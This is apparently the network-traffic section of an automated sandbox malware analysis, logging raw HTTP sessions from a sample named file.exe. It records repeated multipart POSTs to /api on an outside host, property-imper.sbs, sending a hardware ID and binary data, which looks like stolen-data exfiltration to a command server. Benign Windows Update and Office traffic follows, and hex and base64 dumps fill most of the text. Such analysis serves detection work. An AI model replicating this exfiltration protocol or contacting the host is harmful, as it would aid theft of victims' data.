                                                                                                                                                                          Data Ascii: OgN4Q6PpZqk2lu/0v1mOQrx6mc/ZPzDoFPisVrmaAnq6kWrTc/v1qDFFeifwGsxCe3penB+utboWfz7CLRzEufvTb5AnaCeqNdVttT4YjsB9e1zMWz1zqhb8LJC+SFOp+NV+RbPlpqs7Famn+0vK0X86DVoIfXdpVb0u13yagHm5025TY+knajbUr3V+2ggDf/2dTxltIHoWej7CLRRA+zoTbRbz77Yvp1SvJ+qIToO8OJ+M2L6xKJR/7FW8mkF
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 55 4d 6a 71 79 47 6f 4a 30 62 38 4e 6d 79 4f 57 4a 4c 75 2b 42 6b 63 44 6d 6b 6e 66 4d 4c 6f 2b 77 41 70 6e 35 4f 2f 71 52 62 2b 52 62 64 37 39 61 31 6e 51 33 77 6d 50 46 7a 49 41 50 34 38 6e 5a 33 58 38 72 76 6f 31 4c 7a 74 31 48 7a 49 55 36 6e 36 77 33 68 64 38 2b 69 68 4c 57 53 52 4b 62 53 34 6d 5a 2b 44 65 72 70 65 58 41 76 74 49 4f 73 56 66 79 2b 56 2b 51 75 45 76 66 76 51 61 38 43 69 37 50 57 36 5a 31 45 75 39 44 67 62 7a 56 4b 36 76 4a 34 49 47 4c 78 79 4f 52 57 34 62 5a 63 74 43 39 41 38 75 39 42 76 30 4f 61 37 6f 65 78 33 6b 4f 33 6b 2f 70 77 50 77 6d 37 32 7a 74 77 65 62 53 58 36 47 76 7a 74 56 37 7a 64 78 47 71 78 45 61 31 54 59 4f 67 6b 65 65 54 46 62 61 66 71 6a 4a 38 52 66 2f 31 4e 57 67 78 70 70 54 39 44 61 66 72 41 75 73 76 47 61 66 79 44
                                                                                                                                                                          Data Ascii: UMjqyGoJ0b8NmyOWJLu+BkcDmknfMLo+wApn5O/qRb+Rbd79a1nQ3wmPFzIAP48nZ3X8rvo1Lzt1HzIU6n6w3hd8+ihLWSRKbS4mZ+DerpeXAvtIOsVfy+V+QuEvfvQa8Ci7PW6Z1Eu9DgbzVK6vJ4IGLxyORW4bZctC9A8u9Bv0Oa7oex3kO3k/pwPwm72ztwebSX6GvztV7zdxGqxEa1TYOgkeeTFbafqjJ8Rf/1NWgxppT9DafrAusvGafyD
                                                                                                                                                                          2024-11-23 18:01:09 UTC1369INData Raw: 76 31 72 57 64 44 66 43 59 2f 47 77 7a 42 76 58 6e 5a 79 4a 6e 39 39 6d 72 47 63 36 46 64 66 6c 73 42 65 6e 6a 63 34 64 76 68 62 47 62 71 4e 70 72 6a 75 6a 6a 5a 69 4a 48 33 65 64 6a 4d 79 47 36 6a 37 41 65 71 50 74 78 2f 6e 45 4e 36 4f 4d 4e 39 77 36 4c 34 63 37 6e 2b 46 69 39 32 76 78 6d 63 43 54 78 39 48 67 2f 5a 72 53 42 36 46 4b 77 34 78 44 31 61 78 44 71 36 30 72 31 53 5a 57 6d 31 75 6d 64 57 2f 43 48 73 6d 41 34 46 66 62 72 63 6e 78 6e 2b 73 48 6f 51 62 36 69 45 4f 49 68 57 4c 53 71 44 61 73 4f 31 2b 48 52 71 64 42 55 73 39 48 78 63 79 41 44 2b 50 4a 32 64 31 2f 4b 36 71 56 54 39 62 56 58 79 6c 38 68 37 66 52 41 74 6b 6e 4e 67 5a 47 78 33 6d 75 4f 36 4f 4e 6d 49 6b 66 64 35 32 4d 7a 49 62 71 50 73 42 36 6f 2b 33 48 2b 63 51 33 6f 34 77 2b 5a 53 5a
                                                                                                                                                                          Data Ascii: v1rWdDfCY/GwzBvXnZyJn99mrGc6FdflsBenjc4dvhbGbqNprjujjZiJH3edjMyG6j7AeqPtx/nEN6OMN9w6L4c7n+Fi92vxmcCTx9Hg/ZrSB6FKw4xD1axDq60r1SZWm1umdW/CHsmA4Ffbrcnxn+sHoQb6iEOIhWLSqDasO1+HRqdBUs9HxcyAD+PJ2d1/K6qVT9bVXyl8h7fRAtknNgZGx3muO6ONmIkfd52MzIbqPsB6o+3H+cQ3o4w+ZSZ


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.549706172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:11 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=295X56K9YCLDGJWB
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 12829
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:11 UTC12829OUTData Raw: 2d 2d 32 39 35 58 35 36 4b 39 59 43 4c 44 47 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 37 41 34 46 43 34 41 33 37 45 39 46 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 32 39 35 58 35 36 4b 39 59 43 4c 44 47 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 39 35 58 35 36 4b 39 59 43 4c 44 47 4a 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                          Data Ascii: --295X56K9YCLDGJWBContent-Disposition: form-data; name="hwid"BA7A4FC4A37E9FACD7CBBD6DF28D3732--295X56K9YCLDGJWBContent-Disposition: form-data; name="pid"2--295X56K9YCLDGJWBContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                          2024-11-23 18:01:13 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:12 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=dlaekp8sm2p57g3d5k2cgik60e; expires=Wed, 19-Mar-2025 11:47:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wolWqA652QUS8gCvXRSvLxuLViazIVy2p%2F0%2BLxb70PSJaafXswoEj64lBSarHoNodxxAudnZajiiUX79imMWW6eahULKoDLdU%2FacGYGteIY2eiqPhbLl9sF8wHrbwgus6D1PHMQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e731027bcb6c345-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13769&delivery_rate=1741204&cwnd=178&unsent_bytes=0&cid=13e28ce1c6a525ec&ts=1556&x=0"
                                                                                                                                                                          2024-11-23 18:01:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                          2024-11-23 18:01:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.549707172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:14 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=YNRDXUM2ST
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 15035
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:14 UTC15035OUTData Raw: 2d 2d 59 4e 52 44 58 55 4d 32 53 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 37 41 34 46 43 34 41 33 37 45 39 46 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 59 4e 52 44 58 55 4d 32 53 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4e 52 44 58 55 4d 32 53 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 4e 52 44 58 55 4d 32 53 54 0d 0a 43 6f
                                                                                                                                                                          Data Ascii: --YNRDXUM2STContent-Disposition: form-data; name="hwid"BA7A4FC4A37E9FACD7CBBD6DF28D3732--YNRDXUM2STContent-Disposition: form-data; name="pid"2--YNRDXUM2STContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YNRDXUM2STCo
                                                                                                                                                                          2024-11-23 18:01:16 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:16 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=mfsivk0if60ab2dmdkuq4ieecf; expires=Wed, 19-Mar-2025 11:47:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGb59e3ZDQQm%2F5FNaO%2FWwN5ZC9dyx3dgcipiN00iEkNbQ01Buf682iQ9MdDo32gVdxBCWn6z57%2FV6txEp4%2BZLjpBVYJcm%2FlQVTCywwS%2ByxQSS2dd9uFDkqKxDO6rzL1jbkIHiyk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e731039ef5442ad-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15969&delivery_rate=1691772&cwnd=238&unsent_bytes=0&cid=15641a223d68f201&ts=2240&x=0"
                                                                                                                                                                          2024-11-23 18:01:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                          2024-11-23 18:01:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.549708172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:18 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=YE5IEITLYVY
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 20531
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:18 UTC15331OUTData Raw: 2d 2d 59 45 35 49 45 49 54 4c 59 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 37 41 34 46 43 34 41 33 37 45 39 46 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 59 45 35 49 45 49 54 4c 59 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 59 45 35 49 45 49 54 4c 59 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 45 35 49 45 49 54 4c 59 56 59
                                                                                                                                                                          Data Ascii: --YE5IEITLYVYContent-Disposition: form-data; name="hwid"BA7A4FC4A37E9FACD7CBBD6DF28D3732--YE5IEITLYVYContent-Disposition: form-data; name="pid"3--YE5IEITLYVYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YE5IEITLYVY
                                                                                                                                                                          2024-11-23 18:01:18 UTC5200OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: un 4F([:7s~X`nO`i
                                                                                                                                                                          2024-11-23 18:01:19 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:19 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=pa86k2f92kb2n86thrpoqd30td; expires=Wed, 19-Mar-2025 11:47:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9O9LAOZMjftRq44ScMlvcSZoGYvldqDq16bMA8QAVPnRPrSHZcDDXv9GQ3WeVn%2FDnRePot5yyMhB%2B9%2FAbIS3NHYCjtU7Lmx98suuDa4AQr9Mv9fE6un0TleZtqVsL20ljkEDzo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e7310510acb4337-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2153&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21488&delivery_rate=1275109&cwnd=215&unsent_bytes=0&cid=0bddbe95e107892a&ts=1248&x=0"
                                                                                                                                                                          2024-11-23 18:01:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                          2024-11-23 18:01:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.549710172.67.162.844437288C:\Users\user\Desktop\file.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:20 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Content-Type: multipart/form-data; boundary=3QUZK3TAT
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                          Content-Length: 1214
                                                                                                                                                                          Host: property-imper.sbs
                                                                                                                                                                          2024-11-23 18:01:20 UTC1214OUTData Raw: 2d 2d 33 51 55 5a 4b 33 54 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 37 41 34 46 43 34 41 33 37 45 39 46 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 33 51 55 5a 4b 33 54 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 51 55 5a 4b 33 54 41 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 33 51 55 5a 4b 33 54 41 54 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                          Data Ascii: --3QUZK3TATContent-Disposition: form-data; name="hwid"BA7A4FC4A37E9FACD7CBBD6DF28D3732--3QUZK3TATContent-Disposition: form-data; name="pid"1--3QUZK3TATContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--3QUZK3TATConten
                                                                                                                                                                          2024-11-23 18:01:21 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:21 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Set-Cookie: PHPSESSID=frs8q9e2j20slq34f6b8p8751a; expires=Wed, 19-Mar-2025 11:48:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vh1tWlPtjh574t9ryX39P8Ryatzc6npMbttXqXGlqcJWO683JOFNLvRhek%2BRBcRy9hzJVrlCuPdnIz41X7LyAj9H1j%2FoUzD5EYLEFO7q1MMiEch%2BbSl30ibm2RdE%2FMWYwy1sDk0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8e7310633d39729b-EWR
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2124&delivery_rate=1395793&cwnd=249&unsent_bytes=0&cid=3b701541d0872e94&ts=717&x=0"
                                                                                                                                                                          2024-11-23 18:01:21 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                          Data Ascii: eok 8.46.123.75
                                                                                                                                                                          2024-11-23 18:01:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.54970952.149.20.212443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:22 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bGZxU9wu8Nf8x8+&MD=5Ek2bgCM HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                          2024-11-23 18:01:23 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Expires: -1
                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                          MS-CorrelationId: eea8c1bb-7397-4a71-9288-8525280947c7
                                                                                                                                                                          MS-RequestId: 0e9499f2-b5c0-481e-93ed-a5ed642406eb
                                                                                                                                                                          MS-CV: VZm4sf7cyUm7O0fl.0
                                                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:22 GMT
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 24490
                                                                                                                                                                          2024-11-23 18:01:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                          2024-11-23 18:01:23 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                          7192.168.2.54971213.107.246.63443
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-11-23 18:01:23 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                          2024-11-23 18:01:23 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                          Date: Sat, 23 Nov 2024 18:01:23 GMT
                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                          Content-Length: 218853
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Cache-Control: public
                                                                                                                                                                          Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                          ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                          x-ms-request-id: 91a9dc6d-001e-0028-4620-3dc49f000000
                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                          x-azure-ref: 20241123T180123Z-174c587ffdfks6tlhC1TEBeza400000003c0000000008hs3
                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                          Accept-Ranges: bytes
